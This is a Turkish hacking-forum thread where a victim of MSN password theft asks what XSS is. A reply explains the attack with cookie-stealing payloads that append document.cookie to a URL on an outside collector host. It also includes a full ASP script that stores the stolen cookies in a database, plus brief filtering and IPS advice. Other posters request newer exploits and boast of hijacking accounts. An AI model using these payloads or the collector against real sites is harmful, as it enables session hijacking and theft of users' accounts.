Xss Açığı Nedir??
-
ya arkadaslar bu xss açığı denen şey yüzünden bütn msn adreslerimin şifrelerini buluo arkadslar ya..bu nedir bend öğreneğim bi yardımcı olurmusun ya..
-
XSS Açıkları Request ile kullanıcıdan alınan verilerin sayfa içinde
Yazdırılması ile oluşur. Örneğin QueryString ile alınan sayfa
numaraları yada ilgili kaydı gösteren id değişkenleri.
http://www.hedefsite/Default.Asp?Page=1 yada
http://www.hedefsite/Product.Asp?id=1
http://www.hedefsite/Default.Asp?Kategori=Haber gibi.
Örnek XSS Açığı ile Ne yapılabilir :
Yukardaki örnekler gibi açığımızı buluyoruz yada hedef sitede
Webservis sayaç kodunun olması yeterli.
Açığımızı bulduktan sonra kullanıcının Cookie'sini _JavaScript
(document.cookie ) ile okuyup istediğimiz bir adresteki veri tabanına
kayıt ediyoruz yada kendimize mail atıyoruz.
-------------------------
http://www.hedefsite.com/Default.Asp?Page=2">http://www.yavşak-warrior.org/yakala.asp?X='+escape(document.cookie )
-------------------------
Saldırgan Url’nin sonuna "> Eklentisi ile Inputların sonlandırılmasını
ve bundan sonra eklenen zararlı kodları Explorer’ın icra etmesini sağlar.
Bu Link’e tıklayan kullanıcının Cookie’si Belirtilen Kaynağa Post edilir.
Yada : Hedef sitede yazdığınız mesajı gösterebilecek uygulamalar var
ise ziyaretçi defteri, forum vb. uygulama
----------------------------
http://www.yavşak-warrior.org/yakala.asp?X='
+document.cookie
----------------------------
Bu kod ilgili sayfada görüntülendiği anda sayfayı görüntüleyen
kullanıcıların cookielerini alarak yakala.asp dosyasına veri tabanına
kaydetmesi için gönderir.
Web Sayfanızda XSS açıkları kapatılmış Olsada, Webservis Sayac kodu
var ise bu sayesinde XSS Açığı Oluşuyor.
WebServis Tarafından verilen ve Sitenize eklediğiniz;
------------------------------------
wbanner=11;
href=http://www.webservis.gen">http://www.webservis.gen.tr/sayac.js">
-------------------------------------
XSS Açıklarını Engellemek için:
Request ile alınan değerleri her zaman QueryString’de olsa Replace ile
Aşağıdaki şekilde temizleyin
Ve Request verilerini alırken mutlaka tam sayıya çevirin
Recid = CInt(Trim(Server.HTMLEncode("Recid" ) )
Recid = Replace(Recid, "<" , "<" ’küçüktür
Recid = Replace(Recid, ">" , ">" ’büyüktür
Recid = Replace(Recide, "’" , "’" ’tek tırnak
Recid = Replace(Recid, Chr(10 ) , "" ’Satır Başı
Recid = Replace(Recid, Chr(34 ) , "" ’çift tırnak
---------------------------------------------------
ASP.NET ’de
web.config Dosyasında aşağıdaki değişikleri yaptığınızda " ’ "
gibi karakterleri sistem kendisi kontrol eder. Bu Sayede hemen hemen
hiçbir XSS ve SQL Enjeksiyon teknikleri Etkili olmaz
IPS Kullanıyor iseniz
Yeni imza yaratıp
Application Layer / HTTP / HTTP.URL_DECODED
Protokolüne;
’ Tek Tırnak,
" Çift Tırnak
< Küçük
> Büyük
Karakterlerini ekleyerek XSS ve SQL Enjeksiyon Saldırılarını Direkt
Engelleyebilirsiniz...
----------------------------------------------------------------------------------
Yakala.ASP’den Gelen Verileri yakalamak ve Veritabanına kaydetmek için
Örnek Basit bir ASP Dosyası
X = Request.QueryString("X" Yerine
Veri URL’den geleceği için
X = Request.ServerVariables("HTTP_REFERER" de Kullanabilirsiniz.
"Yakala.mdb" adında bir database oluşturun "tblYakala" adında bir
tablo ve "Sayfa" Adında (alan tipi Not ) Oalcak şekilde Tasarlayın
--------------------Yakala.Asp-----------------------------------
<%
Dim X
X = Request.QueryString("X"
%>
<%
Dim ConnString,bag
ConnString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &
server.mappath("Yakala.mdb" & ";"
set bag = Server.CreateObject("ADODB.Connection"
bag.Open ConnString
%>
<%
Dim SQL,Rs
Set Rs=Server.CreateObject("ADODB.Recordset"
SQL="Select * From tblYakala"
Rs.Open SQL,ConnString,1,3
End iF
%>
<%
Rs.AddNew
Rs("Sayfa"=X
Rs.Update
Rs.Close
%> -
konu açmadan evvel döküman arşivine bakman daha iyi olurdu.
-
bunun yenisi varmı bir biliginiz varmı ? acil ihtiyacım var bulan olursa yazarmısınız pls
-
hotmail dede vardı xss:D Az msn goturmedim :D
-
anubisx bunu yazdı:
-----------------------------
-------------------------
http://www.hedefsite.com/Default.Asp?Page=2">http://www.cyber-warrior.org/yakala.asp?X='+escape(document.cookie )
-------------------------
-----------------------------DİKKAT!!!
Şahsi görüşüm bu Postun editlenmesi gerekiyor. Mod arkadaşlara duyurulur.
-
xss nin ne olduğunu öğreneceğine nasıl korunurum diye sorsan olmazmıydı ? açığın ne olduğunu zahmet edip arasan bulurdun zaten dökümanlarda'da yada forumlarda bu kadar beleşçi olma
-
Paşam sende tanımadığın maileri acma Sil mailine gelen linklere tıklama...
-
ya abi çocuk bana mail fln yolamad..benm adreside o eklemişş çocukla konusrken bana sende xss açığı var senin şifreni şimdi değiştirecem dedi..sonra o adrese bidaha girmemdm:(
Toplam Hit: 14916 Toplam Mesaj: 9